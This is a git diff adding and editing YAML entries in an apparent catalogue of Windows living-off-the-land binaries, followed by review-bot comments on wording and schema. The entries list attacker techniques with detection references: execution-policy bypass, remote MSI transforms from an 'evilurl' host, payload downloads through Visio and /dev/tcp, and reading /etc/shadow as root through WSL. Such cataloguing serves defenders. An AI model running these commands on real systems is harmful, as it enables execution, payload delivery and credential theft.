diff --git a/yml/HonorableMentions/PowerShell.yml b/yml/HonorableMentions/PowerShell.yml new file mode 100644 index 0000000..dfc3048 --- /dev/null +++ b/yml/HonorableMentions/PowerShell.yml 
@@ -0,0 +1,38 @@ +--- +Name: Powershell.exe +Description: Powershell.exe is a a task-based command-line shell built on .NET. +Author: 'Everyone' +Created: 2024-04-03 +Commands: + - Command: powershell.exe -ep bypass -file c:\path\to\a\script.ps1 + Description: Set the execution policy to bypass and execute a PowerShell script without warning + Usecase: Execute PowerShell cmdlets, .NET code, and just about anything else your heart desires + Category: Execute + Privileges: User + MitreID: T1059.001 + OperatingSystem: Windows 7 and up + - Command: powershell.exe -ep bypass -command "Invoke-AllTheThings..." + Description: Set the execution policy to bypass and execute a PowerShell command + Usecase: Execute PowerShell cmdlets, .NET code, and just about anything else your heart desires + Category: Execute + Privileges: User + MitreID: T1059.001 + OperatingSystem: Windows 7 and up + - Command: powershell.exe -ep bypass -ec IgBXAGUAIAA8ADMAIABMAE8ATABCAEEAUwAiAA== + Description: Set the execution policy to bypass and execute a very malicious PowerShell encoded command + Usecase: Execute PowerShell cmdlets, .NET code, and just about anything else your heart desires + Category: Execute + Privileges: User + MitreID: T1059.001 + OperatingSystem: Windows 7 and up +Full_Path: + - Path: '%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe' + - Path: '%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe' +Detection: + - Sigma: https://github.com/SigmaHQ/sigma/tree/71ae004b32bb3c7fb04714f8a051fc8e5edda68c/rules/windows/powershell +Resources: + - Link: https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_powershell_exe?view=powershell-5.1 + - Link: https://attack.mitre.org/techniques/T1059/001/ +Acknowledgement: + - Person: Everyone + Handle: '@alltheoffensivecyberers' diff --git a/yml/OSBinaries/Csc.yml b/yml/OSBinaries/Csc.yml index 945b584..6b8517c 100644 --- a/yml/OSBinaries/Csc.yml +++ b/yml/OSBinaries/Csc.yml 
@@ -1,18 +1,18 @@ --- Name: Csc.exe -Description: Binary file used by .NET to compile C# code +Description: Binary file used by .NET Framework to compile C# code Author: 'Oddvar Moe' Created: 2018-05-25 Commands: - - Command: csc.exe -out:My.exe File.cs - Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe. + - Command: csc.exe -out:Output.exe File.cs + Description: Use csc.exe to compile C# code, targeting the .NET Framework, stored in File.cs and output the compiled version to Output.exe. Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile Privileges: User MitreID: T1127 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: csc -target:library File.cs - Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to a dll file. + Description: Use csc.exe to compile C# code, targeting the .NET Framework, stored in File.cs and output the compiled version to a DLL file. Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile Privileges: User @@ -30,7 +30,4 @@ Detection: - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml - IOC: Csc.exe should normally not run as System account unless it is used for development. Resources: - - Link: https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe -Acknowledgement: - - Person: - Handle: + - Link: https://learn.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/ diff --git a/yml/OSBinaries/Msiexec.yml b/yml/OSBinaries/Msiexec.yml index 2e69f24..35a97e4 100644 --- a/yml/OSBinaries/Msiexec.yml +++ b/yml/OSBinaries/Msiexec.yml 
@@ -19,7 +19,7 @@ Commands: MitreID: T1218.007 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: msiexec /y "C:\folder\evil.dll" - Description: Calls DLLRegisterServer to register the target DLL. + Description: Calls DllRegisterServer to register the target DLL. Usecase: Execute dll files Category: Execute Privileges: User @@ -28,7 +28,7 @@ Commands: Tags: - Execute: DLL - Command: msiexec /z "C:\folder\evil.dll" - Description: Calls DLLUnregisterServer to un-register the target DLL. + Description: Calls DllUnregisterServer to un-register the target DLL. Usecase: Execute dll files Category: Execute Privileges: User @@ -37,12 +37,12 @@ Commands: Tags: - Execute: DLL - Command: msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb - Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a Transformfile will be used, which can contains malicious code or binaries. The /qb will skip user input. - Usecase: Install trusted and signed msi file, with additional attack code as Treansorm file, from remote server + Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a transformation file will be used, which can contains malicious code or binaries. The /qb will skip user input. + Usecase: Install trusted and signed msi file, with additional attack code as transformation file, from a remote server Category: Execute Privileges: User MitreID: T1218.007 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\msiexec.exe - Path: C:\Windows\SysWOW64\msiexec.exe diff --git a/yml/OSBinaries/Winget.yml b/yml/OSBinaries/Winget.yml index cd2588d..d2629de 100644 --- a/yml/OSBinaries/Winget.yml 
+++ b/yml/OSBinaries/Winget.yml @@ -8,7 +8,7 @@ Commands: Description: 'Downloads a file from the web address specified in manifest.yml and executes it on the system. Local manifest setting must be enabled in winget for it to work: "winget settings --enable LocalManifestFiles"' Usecase: Download and execute an arbitrary file from the internet Category: Execute - Privileges: Local Aministrator - required to enabled local manifest setting + Privileges: Local Administrator - required to enable local manifest setting MitreID: T1105 OperatingSystem: Windows 10, Windows 11 Full_Path: diff --git a/yml/OtherMSBinaries/Visio.yml b/yml/OtherMSBinaries/Visio.yml new file mode 100644 index 0000000..2c141e5 --- /dev/null +++ b/yml/OtherMSBinaries/Visio.yml 
@@ -0,0 +1,34 @@ +--- +Name: Visio.exe +Description: Microsoft Visio Executable +Author: Avihay Eldad +Created: 2024-02-15 +Commands: + - Command: Visio.exe https://example.com/payload + Description: Downloads payload from remote server + Usecase: It will download a remote payload and place it in INetCache. + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows + Tags: + - Download: INetCache +Full_Path: + - Path: C:\Program Files (x86)\Microsoft Office\Office14\Visio.exe + - Path: C:\Program Files\Microsoft Office\Office14\Visio.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office15\Visio.exe + - Path: C:\Program Files\Microsoft Office\Office15\Visio.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office16\Visio.exe + - Path: C:\Program Files\Microsoft Office\Office16\Visio.exe + - Path: C:\Program Files (x86)\Microsoft Office\root\Office14\Visio.exe + - Path: C:\Program Files\Microsoft Office\root\Office14\Visio.exe + - Path: C:\Program Files (x86)\Microsoft Office\root\Office15\Visio.exe + - Path: C:\Program Files\Microsoft Office\root\Office15\Visio.exe + - Path: C:\Program Files (x86)\Microsoft Office\root\Office16\Visio.exe + - Path: C:\Program Files\Microsoft Office\root\Office16\Visio.exe +Detection: + - IOC: URL on a visio.exe command line + - IOC: visio.exe making unexpected network connections or DNS requests +Acknowledgement: + - Person: Avihay Eldad + Handle: '@AvihayEldad' diff --git a/yml/OtherMSBinaries/Wsl.yml b/yml/OtherMSBinaries/Wsl.yml index e1a5bda..e1493d1 100644 --- a/yml/OtherMSBinaries/Wsl.yml +++ b/yml/OtherMSBinaries/Wsl.yml 
@@ -10,35 +10,28 @@ Commands: Category: Execute Privileges: User MitreID: T1202 - OperatingSystem: Windows 10, Windows 19 Server + OperatingSystem: Windows 10, Windows Server 2019, Windows 11 - Command: wsl.exe -u root -e cat /etc/shadow Description: Cats /etc/shadow file as root Usecase: Performs execution of arbitrary Linux commands as root without need for password. Category: Execute Privileges: User MitreID: T1202 - OperatingSystem: Windows 10, Windows 19 Server - - Command: wsl.exe --exec bash -c 'cat file' - Description: Cats /etc/shadow file as root + OperatingSystem: Windows 10, Windows Server 2019, Windows 11 + - Command: wsl.exe --exec bash -c "" + Description: Executes Linux command (for example via bash) as the default user (unless stated otherwise using `-u `) on the default WSL distro (unless stated otherwise using `-d `) Usecase: Performs execution of arbitrary Linux commands. Category: Execute Privileges: User MitreID: T1202 - OperatingSystem: Windows 10, Windows 19 Server - - Command: wsl.exe --system calc.exe - Description: Execute the command as root - Usecase: Performs execution of arbitrary Linux commands as root without need for password. - Category: Execute - Privileges: User - MitreID: T1202 - OperatingSystem: Windows 11 + OperatingSystem: Windows 10, Windows Server 2019, Windows 11 - Command: wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary' Description: Downloads file from 192.168.1.10 Usecase: Download file Category: Download Privileges: User - MitreID: T1202 - OperatingSystem: Windows 10, Windows 19 Server + MitreID: T1105 + OperatingSystem: Windows 10, Windows Server 2019, Windows 11 Full_Path: - Path: C:\Windows\System32\wsl.exe Code_Sample: @@ -59,3 +52,4 @@ Acknowledgement: Handle: '@d1r4c' - Person: Nasreddine Bencherchali Handle: '@nas_bench' + - Person: Konrad 'unrooted' Klawikowski diff --git a/yml/OtherMSBinaries/winfile.yml b/yml/OtherMSBinaries/winfile.yml new file mode 100644 index 0000000..f0171ed 
--- /dev/null +++ b/yml/OtherMSBinaries/winfile.yml @@ -0,0 +1,24 @@ +--- +Name: winfile.exe +Description: Windows File Manager executable +Author: Avihay Eldad +Created: 2024-04-30 +Commands: + - Command: winfile.exe calc.exe + Description: Execute an executable file with WinFile as a parent process. + Usecase: Performs execution of specified file, can be used as a defense evasion + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 10, Windows 11 +Full_Path: + - Path: C:\Windows\System32\winfile.exe + - Path: C:\Windows\winfile.exe + - Path: C:\Program Files\WinFile\winfile.exe + - Path: C:\Program Files (x86)\WinFile\winfile.exe + - Path: C:\Program Files\WindowsApps\Microsoft.WindowsFileManager_10.3.0.0_x64__8wekyb3d8bbwe\WinFile\winfile.exe +Resources: + - Link: https://github.com/microsoft/winfile +Acknowledgement: + - Person: Avihay Eldad + Handle: '@AvihayEldad'
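Review bot: in the new PowerShell.yml, the Description line has a doubled article ("is a a task-based command-line shell"); it should read "Powershell.exe is a task-based command-line shell built on .NET." Author 'Everyone' and Handle '@alltheoffensivecyberers' also read as placeholders rather than an attributable credit, and "OperatingSystem: Windows 7 and up" departs from the enumerated-version form the other entries in this patch use (e.g. Csc.yml, winfile.yml); consider matching that convention so the files stay consistent.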
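Review bot: in the first Csc.yml hunk (@@ -1,18 +1,18 @@), inserting "targeting the .NET Framework," between commas leaves the two rewritten Description lines reading awkwardly ("compile C# code, targeting the .NET Framework, stored in File.cs and output..."); suggest "Use csc.exe to compile C# code stored in File.cs, targeting the .NET Framework, and write the compiled version to Output.exe." The unchanged context line "OperatingSystem: Windows vista, ..." also keeps the lowercase "vista" that the Msiexec.yml hunk in this same patch corrects to "Windows Vista"; fix it here too.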
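Review bot: the second Csc.yml hunk (@@ -30,7 +30,4 @@) removes the Acknowledgement section entirely rather than filling in the empty Person/Handle fields; every other entry touched by this patch carries an Acknowledgement block, so dropping it makes Csc.yml an outlier against the schema the other files follow. Either complete it (at minimum crediting the listed Author, 'Oddvar Moe') or state why the section is intentionally absent. The link update to learn.microsoft.com is fine.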
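Review bot: in the third Msiexec.yml hunk (@@ -37,12 +37,12 @@), the rewritten Description still carries grammar errors ("the file can be signed by vendor", "which can contains malicious code or binaries"); since the line is being touched anyway, suggest "Installs the target .MSI file from a remote URL; the file can be signed by the vendor. In addition, a transform file (.mst) is applied, which can contain malicious code or binaries. /qb suppresses user input." Replacing "Treansorm" is good, but Windows Installer calls these files transforms, matching the TRANSFORMS= property in the command line, so "transform file" is the more precise term than "transformation file" in both the Description and the Usecase.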
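Review bot: in the new Visio.yml, OperatingSystem is given only as "Windows", while the other entries in this patch enumerate versions (e.g. "Windows 10, Windows 11"); please state which versions were verified. The Description ("Downloads payload from remote server") and Usecase ("It will download a remote payload and place it in INetCache.") also largely repeat each other; the other entries use Usecase for the effect or purpose, so the INetCache detail belongs in the Description and the Usecase should state the effect. The two IOC lines are a reasonable start; if a Sigma rule exists, linking it as the PowerShell.yml entry does would strengthen the Detection section.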
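Review bot: in the first Wsl.yml hunk (@@ -10,35 +10,28 @@), the replacement command line `wsl.exe --exec bash -c ""` has an empty argument, and the Description's backticked placeholders (`-u ` and `-d `) are empty as well, so the entry no longer shows what goes in those positions; fill in placeholder names for the user and distro so the entry is self-explanatory. The removal of the `wsl.exe --system calc.exe` entry is not explained anywhere in the hunk; if it was dropped because its Description ("Execute the command as root") did not match the command, say so in the commit message or correct the wording instead of deleting the entry. The MitreID change from T1202 to T1105 for the download entry is correct.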
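Review bot: in the second Wsl.yml hunk (@@ -59,3 +52,4 @@), the new Acknowledgement entry for Konrad 'unrooted' Klawikowski has a Person line but no Handle line, unlike the two entries above it ('@d1r4c', '@nas_bench'); add a Handle line, even if empty, so the block stays uniform.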
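Review bot: the new winfile.yml has no Detection section, whereas the Visio.yml entry in the same patch includes IOC lines; since the Usecase explicitly frames this as defense evasion through winfile.exe acting as the parent process, at least an IOC such as "winfile.exe spawning child processes unrelated to file management" would help defenders. The Description's "Execute an executable file" is redundant; suggest "Executes the specified file with winfile.exe as the parent process." The WindowsApps Full_Path pins a package version (Microsoft.WindowsFileManager_10.3.0.0_x64__8wekyb3d8bbwe), which will go stale on the next update; indicate that the version segment varies.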